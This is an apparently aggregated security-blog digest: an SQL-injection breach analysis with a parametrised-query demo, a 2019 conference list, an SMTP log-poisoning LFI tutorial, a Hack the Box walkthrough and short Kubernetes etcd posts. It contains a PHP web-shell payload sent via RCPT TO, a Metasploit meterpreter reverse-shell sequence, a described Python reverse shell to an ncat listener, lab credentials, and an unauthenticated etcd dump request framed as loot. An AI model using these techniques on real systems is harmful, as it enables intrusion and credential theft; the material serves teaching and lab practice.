Daily Archives: January 6, 2019

How data breaches happen

Data breaches happen.

Today, as never before, data plays a fundamental role in our real life. Everybody is both a data producer and a data consumer. We are data producers simply by moving from one building to another with a smartphone in our pocket, by surfing the web, or just by tapping on smartphone applications. We are data consumers when we buy things on Amazon, when we read information on social networks, or when we consume raw data through an API. Some refer to data as the "new oil" (a concept usually credited to Clive Humby): data is what we leave in the digital world, and it sits very close to our physical life. Data is what we are in cyberspace. Data is what we need to protect.

Protecting our private data is like protecting ourselves in the cyber world, and for that reason the protection needs to be regulated (GDPR teaches us that). So it is very interesting to understand how data breaches happen.

Unfortunately there is no standard path to protect: a data breach might come through an insider attack, through a click on a malspam campaign, through email phishing, or through common vulnerabilities. But one of the main paths, so far, is driven by vulnerabilities. One of the vulnerabilities most exploited by attackers to illegally collect data is SQL injection (SQLi). It is pretty easy to detect and to exploit, even for unsophisticated attackers. On the other side of the coin there are a lot of frameworks, design patterns and methodologies to prevent and block such a vulnerability. From here I started my research. I wanted to prove that SQLi vulnerabilities are quite "rare" (or difficult to find) in 2019, but, unfortunately, I had to acknowledge that I was wrong when I found these fresh pastes (here, here and here). The "possible attacker" exposed a set of "presumed" SQLi-vulnerable websites harvested in a matter of 24 hours of internet scanning.

Principal domain names with SQLi
According to the "pastes", the attacker harvested roughly 327 vulnerable websites in less than a day! So let's dig a little into them to see if we can find some interesting correlations.

A first interesting result comes from the top-level domain names. Leaving out ".com" (which is the most commonly used domain), it is possible to see additional interesting domain names such as ".ca", ".it", ".ir", ".ch", ".il" and so on, which are mostly country-based domain names. I agree with those who might think that the dataset cannot be considered a "significant dataset", since 24 hours of internet scraping is far, far away from a significant view of the internet, but we might agree that it can be considered an "indicative dataset". In other words, if in only 24 hours of internet scraping he or she found roughly 327 vulnerable websites, let's imagine what an attacker could do with weeks or months of scraping power. It is still interesting to see that no specific geographic targets and/or country patterns emerged (for example: only the richest or poorest countries, or European countries, or countries with cyber activists, or countries in a war conflict, etc.), suggesting that the issue (having SQLi-vulnerable websites) is still quite widespread all over the world. The following map shows the geographic distribution of the domain names; domains such as ".ld", ".dk", ".nz", ".ug", "gk", ... took a single hit and so are not visualised.

Domain Names Geographically Distributed

The following histogram shows the percentage of web server technologies found in front of the "presumed" vulnerable websites. Apache and Nginx are the most commonly used. I am not saying that Apache and Nginx are vulnerable to SQLi, or that they somehow cause or enable vulnerable web pages, nor that they are responsible in any way for serving vulnerable applications. Indeed, vulnerable applications have no direct link to the web server used; I am just observing the analysed data. It could be an "obvious consequence", since Apache and Nginx are the most used technologies on the web, or maybe not.

Percentage of web server technology in front of vulnerable websites
A little more interesting is the distribution of database technologies used by the presumed SQLi-vulnerable websites. It might hint at the application "type". For example, we might believe that applications built on top of Microsoft Access are quite "old applications" (this is not always true, I am aware of it, but it might be an indicative parameter to consider in SQLi research), or that applications built on top of Oracle databases are corporate applications rather than open-source and/or "mockup" applications. We might stretch this concept a little by assuming that applications built on top of Microsoft SQL Server are professional/company applications, and so on and so forth. Of course we cannot walk the same way starting from MySQL or PostgreSQL, since both are used in open-source/free applications as well as in corporate and professional ones.

Percentage of database technology in the backend of vulnerable websites
Every day we read about personal data breaches. One of the latest ones happened in German politics (more info here, here and here). Data breaches might sap our companies and our digital identities; regulations have been made trying to normalise and block breaches, but unfortunately in 2019 it is still easy to get random personal data out of the internet. In this personal research, which started on the dark web and finally ended up on "paste" websites, I found that a common and quite easy way to mine personal data, even in 2019, is through SQL injection, which is surprisingly still effective despite hundreds of countermeasures (such as frameworks, design patterns, native parametrised queries, etc.). The main reason for the roughly 327 vulnerable websites found in less than a day (according to the pastes) is unpatched software versions. In fact, it is easy to find common Google dorks in the attacker's patterns. Blocking well-known SQLi vulnerabilities is as simple as patching your website. Please do it for the safety of your users.
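To make the last point concrete, here is an added example (not from the original post) that contrasts a string-built query with the native parametrised query the post names as a countermeasure. It uses an in-memory SQLite table with constructed sample rows and shows why the same input returns every row in one case and none in the other:

```python
import sqlite3

# Constructed sample data: a tiny users table standing in for a website backend.
SAMPLE_USERS = [
    ("alice", "alice@example.org"),
    ("bob", "bob@example.org"),
    ("carol", "carol@example.org"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Builds the SQL by string concatenation: the input becomes part of the
    query text, so a quote character in it changes the meaning of the query."""
    query = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_parametrised(conn: sqlite3.Connection, name: str) -> list:
    """Uses a bound parameter: the driver hands the input to the engine as a
    value, never as query text, so it is only ever compared with the column."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


def demo() -> dict:
    """Run both lookups with an ordinary name and with a classic tautology
    string, returning the number of rows each combination yields."""
    conn = make_db()
    normal = "alice"
    injected = "x' OR '1'='1"
    return {
        "vulnerable_normal": len(lookup_vulnerable(conn, normal)),
        "vulnerable_injected": len(lookup_vulnerable(conn, injected)),
        "parametrised_normal": len(lookup_parametrised(conn, normal)),
        "parametrised_injected": len(lookup_parametrised(conn, injected)),
    }


if __name__ == "__main__":
    for key, count in demo().items():
        print(f"{key}: {count} row(s)")
```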

Cyber Security Conferences to Attend in 2019

A list of cyber and information security conferences to consider attending in 2019. Conferences are not only great places to learn about the evolving cyber threat landscape and proven security good practices, but also to network with industry-leading security professionals and like-minded enthusiasts, share ideas, expand your own knowledge, and even make good friends.


SANS Cyber Threat Intelligence Summit
Monday 21st & Tuesday 22nd January 2019
Renaissance Arlington Capital View Hotel, VA, USA

AppSec California 2019 (OWASP)
Tuesday 22nd & Wednesday 23rd January 2019
Annenberg Community Beach House, Santa Monica, USA

PCI London
Thursday 24th January 2019
Park Plaza Victoria Hotel, London, UK

The Future of Cyber Security Manchester
Thursday 24th January 2019
Bridgewater Hall, Manchester, UK

BSides Leeds
Friday 25th January 2019
Cloth Hall Court, Leeds, UK

Cyber Security for Industrial Control Systems
Thursday 7th & Friday 8th February 2019
Savoy Place, London, UK

NOORD InfoSec Dialogue UK
Tuesday 26th & Wednesday 27th February 2019
The Bull-Gerrards Cross, Buckinghamshire, UK

MARCH 2019
RSA Conference
Monday 4th to Friday 8th March 2019
Moscone Center, San Francisco, USA

17th Annual e-Crime & Cybersecurity Congress
Tuesday 5th & Wednesday 6th March 2019
Park Plaza Victoria

Security & Counter Terror Expo
Tuesday 5th & Wednesday 6th March 2019
Olympia, London, UK

ISF UK Spring Conference
Wednesday 6th & Thursday 7th March 2019
Regent Park, London, UK

Sunday 3rd and Monday 4th March 2019
City View at Metreon, San Francisco, USA

Cloud and Cyber Security Expo
Tuesday 12th to Wednesday 13th March 2019
ExCel, London, UK

APRIL 2019

(ISC)2 Secure Summit EMEA
Monday 15th & Tuesday 16th April 2019
World Forum, The Hague, Netherlands

Cyber Security Manchester
Wednesday 3rd & Thursday 4th April 2019
Manchester Central, Manchester, UK

BSides Scotland 2019
Tuesday 23rd April 2019
Royal College of Physicians, Edinburgh, UK

CyberUK 2019
Wednesday 24th & Thursday 25th April 2019
Scottish Event Campus, Glasgow, UK

Cyber Security & Cloud Expo Global 2019
Thursday 25th and Friday 29th April 2019
Olympia, London, UK

JUNE 2019
Infosecurity Europe 2019
Tuesday 4th to Thursday 6th June 2019
Olympia, London, UK

BSides London
Thursday 6th June 2019
ILEC Conference Centre, London, UK

Blockchain International Show
Thursday 6th and Friday 7th June 2019
ExCel Exhibition & Conference Centre, London, UK

Hack in Paris 2019
Sunday 16th to Friday 20th June 2019
Maison de la Chimie, Paris, France

UK CISO Executive Summit
Wednesday 19th June 2019
Hilton Park Lane, London, UK

Cyber Security & Cloud Expo Europe 2019
Thursday 19th and Friday 20th June 2019
RIA, Amsterdam, Netherlands

Gartner Security and Risk Management Summit
Monday 17th to Thursday 20th June 2019
National Harbor, MD, USA

European Maritime Cyber Risk Management Summit
Tuesday 25th June 2019
Norton Rose Fulbright, London, UK

Black Hat USA
Saturday 3rd to Thursday 8th August 2019
Mandalay Bay, Las Vegas, NV, USA


Thursday 8th to Sunday 11th August 2019
Paris, Ballys & Planet Hollywood, Las Vegas, NV, USA

Wednesday 11th to Friday 13th September 2019
ILEC Conference Centre, London, UK

2019 PCI SSC North America Community Meeting
Tuesday 17th to Thursday 19th September 2019
Vancouver, BC, Canada


Hacker Halted
Thursday 10th & Friday 11th October 2019
Atlanta, Georgia, USA

Thursday 10th & Friday 11th October 2019
Aula, Gent, Belgium


Wednesday 16th to Friday 19th October 2019
Palexpo Convention Centre, Geneva, Switzerland

6th Annual Industrial Control Cyber Security Europe Conference
Tuesday 29th and Wednesday 30th October 2019
Copthorne Tara, Kensington, London, UK

2019 PCI SSC Europe Community Meeting
Tuesday 22nd to Thursday 24th October 2019
Dublin, Ireland

ISF 30th Annual World Congress
Saturday 26th to Tuesday 29th October 2019
Convention Centre Dublin, Dublin, Ireland

Cyber Security & Cloud Expo North America 2019
Wednesday 13th and Thursday 14th November 2019
Santa Clara Convention Centre, Silicon Valley, USA

DevSecCon London 
Thursday 14th & Friday 15th November 2019
CodeNode, London, UK

Cyber Security Summit 2019
Wednesday 20th November 2019
QEII Centre, London, UK

2019 PCI SSC Asia-Pacific Community Meeting
Wednesday 20th and Thursday 21st November 2019
Melbourne, Australia

Thursday 20th to Saturday 30th November 2019
The Imperial Riding School Vienna, Austria

Post in the comments about any cyber & information security themed conferences or events you recommend.

SMTP Log Poisoning through LFI to Remote Code Execution

Hello friends!! Today we will be discussing SMTP log poisoning. But before getting into the details, kindly read our previous articles "SMTP Lab Set-Up" and "Beginner Guide to File Inclusion Attack (LFI/RFI)". Today you will see how a web server can be exploited by abusing SMTP services if the web server is vulnerable to local file inclusion.

Let's Start!!

With the help of Nmap, we scan for port 25, and the result shows that port 25 is open for the SMTP service.

nmap -p25

This attack is truly based on the local file inclusion attack; therefore I took help from our previous article, where I created a PHP file that allows the user to include a file through the file parameter.

As a result, you can observe that we are able to access the /etc/passwd file of the victim machine.

Now, if you are able to access the mail.log file through the LFI, it means the mail.log has read and write permission, and hence we can infect the log file by injecting malicious code.

Now let's try to enumerate further and connect to the SMTP port (25).

telnet 25

As we can see, we got connected to the victim machine successfully. Now let's try to send a mail via the command line (CLI) of this machine and pass the OS commands via the "RCPT TO" option, since the mail.log file records an entry for every mail when we connect to the server. Taking advantage of this, I will now send malicious PHP code as a fake user, and it will automatically be added to the mail.log file as a new log entry.

MAIL FROM:<rrajchandel@gmail.com>
RCPT TO:<?php system($_GET['c']); ?>

Note: we can ignore the "501 5.1.3 Bad recipient address syntax" server response seen in the above screenshot, because the internal email program of the server (victim machine) is expecting us to enter an email ID, not OS commands.

Our goal is to inject PHP into the logs; this stage is called log file poisoning. Including mail.log through the LFI now shows its contents and also executes the command passed through the c parameter. Now execute ifconfig as the command to verify the network interface, and confirm its result in the given screenshot. &c=ifconfig

But you can observe its output in the page source, as shown in the image below:

This is called SMTP log poisoning, and through such a vulnerability we can easily obtain a reverse shell on the victim's machine.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost
msf exploit (web_delivery)>set srvport  8888
msf exploit (web_delivery)>exploit

Copy the highlighted text shown in the window below.

Paste the copied code into the URL as shown in the image and execute it as the command.

When the above code executes, you will get meterpreter session 1 on the targeted web server.


msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
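The defensive counterpart of the technique above, as an added example that is not from the original post: a small Python checker that scans mail log lines for PHP open tags carried in envelope addresses, which is exactly what a poisoned mail.log entry looks like. The log lines are constructed samples in Postfix's format, not output from the lab, and the client regex assumes Postfix's "from host[addr]" / "client=host[addr]" wording.

```python
import re

# Constructed sample mail log in Postfix's format (not output from the lab);
# lines 2 and 6 carry PHP code smuggled in through the envelope addresses.
SAMPLE_MAIL_LOG = """\
Jan  6 10:11:58 mail postfix/smtpd[2231]: connect from unknown[192.0.2.10]
Jan  6 10:12:01 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[192.0.2.10]: 501 5.1.3 Bad recipient address syntax; from=<rrajchandel@gmail.com> to=<<?php system($_GET['c']); ?>> proto=SMTP helo=<x>
Jan  6 10:12:40 mail postfix/smtpd[2231]: 4F2A1: client=unknown[192.0.2.10]
Jan  6 10:12:41 mail postfix/qmgr[1120]: 4F2A1: from=<alice@example.org>, size=512, nrcpt=1 (queue active)
Jan  6 10:12:41 mail postfix/local[2240]: 4F2A1: to=<bob@example.org>, relay=local, status=sent (delivered to mailbox)
Jan  6 10:13:05 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[192.0.2.10]: 501 5.1.3 Bad recipient address syntax; from=<<?=`$_GET[0]`?>> to=<root@localhost> proto=SMTP helo=<x>
"""

# PHP open tags: "<?php", the short echo tag "<?=", and the bare "<?" short tag.
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)
# Envelope addresses as Postfix logs them: from=<...> and to=<...>.
ENVELOPE = re.compile(r"\b(from|to)=<(.*?)>(?=\s|,|$)")
# The connecting client, logged as "from host[addr]" or "client=host[addr]".
CLIENT = re.compile(r"(?:from|client=)\s*[\w.-]+\[([0-9a-fA-F.:]+)\]")


def find_poisoned_entries(log_text: str) -> list:
    """Return one finding per envelope address that contains a PHP open tag.

    Each finding records the 1-based line number, which field (from/to)
    carried the code, the offending address and the client that sent it.
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for field, address in ENVELOPE.findall(line):
            if PHP_TAG.search(address):
                client = CLIENT.search(line)
                findings.append({
                    "line": lineno,
                    "field": field,
                    "address": address,
                    "client": client.group(1) if client else None,
                })
    return findings


def offending_clients(log_text: str) -> set:
    """Client addresses that submitted poisoned envelopes, for alerting or blocking."""
    return {f["client"] for f in find_poisoned_entries(log_text) if f["client"]}


if __name__ == "__main__":
    for finding in find_poisoned_entries(SAMPLE_MAIL_LOG):
        print(f"line {finding['line']}: PHP in {finding['field']}=<...> "
              f"from {finding['client']}: {finding['address']!r}")
    print("clients to investigate:", sorted(offending_clients(SAMPLE_MAIL_LOG)))
```

A hit here is only the symptom; the root cause on the page is the LFI that lets the web server include mail.log at all, so the same alert should trigger a review of the application's include handling and of the web server account's read access to the mail log.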

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post SMTP Log Poisioning through LFI to Remote Code Excecution appeared first on Hacking Articles.

Hack the Box: Mischief Walkthrough

Today we are going to solve another CTF challenge, "Mischief". Mischief is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network

  • TCP and UDP port scanning (Nmap)
  • SNMP service enumeration (Nmap script)
  • Obtain credentials for port 3366 login
  • Identify IPv6 address (Enyx)
  • Scanning IPv6 (Nmap)

Access Victim’s Shell

  • Abusing web server through Command Execution Panel
  • Obtain reverse Shell via ncat
  • Get user.txt flag

Privilege Escalation

  • Obtain root password from bash_history
  • Find root.txt flag

Scanning Network

Note: Since these labs are available online, they have a static IP. The IP of this lab is

Let's start off with our nmap aggressive scan to find out the open ports and services.

nmap -A

But as you can observe, here we didn't obtain much information; therefore I further scanned the UDP ports, and from the result we got port 161 open for SNMP.

nmap -sU


Because we knew the SNMP service was enabled on the network, I ran the nmap script command for SNMP enumeration.

nmap -p 161 -sC -sV -sU

Hmmm!! So here I found something very interesting: it looks like the login credential to be used for authentication on port 3366.

Let's navigate to port 3366 in the web browser and enter the following credentials.

Username: loki 
Password: godofmischiefisloki

Here we were welcomed by the following web page, which was holding another credential. Let's dig out another way to use this credential to log in.

We use a Python script called Enyx to find the IPv6 address of the target machine. You can get the script from this link.

git clone https://github.com/trickster0/Enyx
python enyx.py 2c public

So, as you can observe, we have enumerated the IPv6 address of the victim's machine; next we scan it using the nmap command given below:

nmap -6 <target IPV6>

Hmmm!! So along with port 22, this time it has also shown port 80 for HTTP services.

So we navigate to the web browser and open the target IPv6 address in the URL; it shows a login page for a command execution panel. We try to log in to this page with the credential we found earlier, but that wasn't a valid credential.

Access Victim’s Shell


Further, I tried brute-forcing the username and successfully logged in with the following combination:

Username: administrator
Password: trickeryanddeceit

Since it was a command execution panel where we can run arbitrary system commands, this was an RCE that could easily be exploited to obtain a reverse shell on the target machine.

But before that, you must know the IPv6 address of your local machine, to use as the listening IP.

For the reverse shell, I used the Python reverse shell code from pentestmonkey and modified the lhost to our IPv6 address. Since both nodes are on IPv6, we need a listener that can accept the reverse connection over IPv6, such as ncat; hence we start an ncat listener on port 1234.

As soon as we execute the malicious Python code, we get the reverse connection via ncat.

Great!! You can observe that we have access to the remote terminal; let's try to find the user.txt file to complete our first task. We found the user.txt file in /home/loki but were unable to read it. However, there was another interesting file, "credentials", and here we found another credential.

As port 22 was running, we connect to the remote machine through SSH using the following credential.

Username: loki 
Password: lokiisthebestnorsegod
ssh loki@

And this time we successfully found the user.txt file, as shown below.

Privilege Escalation

While exploring more, I found the .bash_history file, where I found one more credential for the root user, but loki doesn't have permission to execute the switch user command.

Therefore, we move back to the www-data user shell to run the switch user command and enter the above password for root login, then try to find the root.txt file inside the root directory, but there wasn't any flag there. Therefore, with the help of the find command, we enumerate the path of root.txt.

find / -name root.txt

Booom!! We got the path of the root.txt file, and as you can observe, we have successfully captured the last flag and finished this challenge.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Hack the Box: Mischief Walkthrough appeared first on Hacking Articles.

Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in English is that etcd stores the current state of the Kubernetes cluster, usually including the Kubernetes tokens and passwords. If you check out the following references you can get a sense of the pain level that could potentially be involved. At minimum you can get network info or running pods, and at best credentials.


The second link talks extensively about the types of info they found when they hit all the Shodan endpoints for 2379 and analysed the results.

If you manage to find open etcd, the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

Example Loot - 

Usually it's boring stuff like this:

But occasionally you'll get more interesting things like:

or more fun things like kublet tokens:
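As an added audit helper (not from the original post), this Python function walks the JSON that the recursive /v2/keys request above returns (the {"action":"get","node":{"dir":true,...}} shape that also appears as kube-hunter evidence further down) and lists every leaf whose key path or value looks like credential material, so an operator who finds their own etcd exposed knows what to rotate first. The response below is a constructed sample with made-up keys and values, not loot from a real cluster, and the SENSITIVE pattern is an assumed heuristic, not an etcd or Kubernetes convention.

```python
import json
import re

# Constructed sample of an etcd v2 recursive listing (not from a real cluster).
SAMPLE_RESPONSE = json.dumps({
    "action": "get",
    "node": {
        "dir": True,
        "nodes": [
            {"key": "/network", "dir": True, "nodes": [
                {"key": "/network/config", "value": '{"Network":"10.244.0.0/16"}'},
            ]},
            {"key": "/registry", "dir": True, "nodes": [
                {"key": "/registry/secrets", "dir": True, "nodes": [
                    {"key": "/registry/secrets/kube-system/bootstrap-token-abcdef",
                     "value": "<constructed-secret-object>"},
                ]},
                {"key": "/registry/pods", "dir": True, "nodes": [
                    {"key": "/registry/pods/default/web-1", "value": "<pod-spec>"},
                ]},
            ]},
            {"key": "/app/db", "dir": True, "nodes": [
                {"key": "/app/db/host", "value": "db.internal"},
                {"key": "/app/db/password", "value": "CONSTRUCTED-not-a-real-password"},
            ]},
        ],
    },
})

# Assumed heuristic: key-path or value fragments that usually mean credential
# material is stored at that leaf.
SENSITIVE = re.compile(
    r"secret|token|password|passwd|credential|private[-_]?key|kubeconfig|"
    r"BEGIN (?:RSA |EC )?PRIVATE KEY",
    re.IGNORECASE,
)


def iter_leaves(node: dict):
    """Yield (key, value) for every non-directory node beneath `node`.

    etcd v2 marks directories with "dir": true and nests children in "nodes";
    a directory node may omit "nodes" entirely when it is empty.
    """
    if node.get("dir"):
        for child in node.get("nodes", []):
            yield from iter_leaves(child)
    elif "key" in node:
        yield node["key"], node.get("value", "")


def find_sensitive_keys(response_text: str) -> list:
    """Return the sorted keys of leaves whose path or value matches SENSITIVE."""
    root = json.loads(response_text).get("node", {})
    return sorted(key for key, value in iter_leaves(root)
                  if SENSITIVE.search(key) or SENSITIVE.search(value))


def count_leaves(response_text: str) -> int:
    """Total number of leaf keys: a quick measure of how much state is exposed."""
    root = json.loads(response_text).get("node", {})
    return sum(1 for _ in iter_leaves(root))


if __name__ == "__main__":
    print(f"{count_leaves(SAMPLE_RESPONSE)} keys readable without authentication")
    for key in find_sensitive_keys(SAMPLE_RESPONSE):
        print("rotate:", key)
```

Run it against the saved body of the curl request from your own cluster; the fix for the exposure itself is etcd's TLS client-certificate authentication and not exposing port 2379 beyond the control plane.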

Kubernetes: cAdvisor

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

Runs on port 4194.


What do you get?

Information disclosure about metrics of the containers.

Example request to hit the API and dump data:


Kubernetes: kube-hunter.py etcd

In the master post I mentioned a few auditing tools that exist. Kube-Hunter is one that is pretty OK. You can use it to quickly scan for multiple Kubernetes issues.

Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','):
~ Started
~ Discovering Open Kubernetes Services...
| Etcd:
|   type: open service
|   service: Etcd
|_  host:
| Etcd Remote version disclosure:
|   type: vulnerability
|   host:
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host:
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host:
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.


| TYPE        | LOCATION       |
| Node/Master |        |

Detected Services
| SERVICE | LOCATION            | DESCRIPTION          |
| Etcd    |        | Etcd is a DB that    |
|         |                     | stores cluster's     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |

| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
| | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9     |
|              | Access           | using insecure       | using HTTP (without | ","etcdcluster":"3.3     |
|              |                  | connection (HTTP)    | authorization and   | ...                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
| | Information      | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | ","etcdcluster":"3.3     |
|              |                  |                      | give an attacker a  | ...                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
| | Access Risk      | Etcd Remote Read     | Remote read access  | {"action":"get","nod     |
|              |                  | Access Event         | might expose to an  | e":{"dir":true,"node     |
|              |                  |                      | attacker cluster's  | ...                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |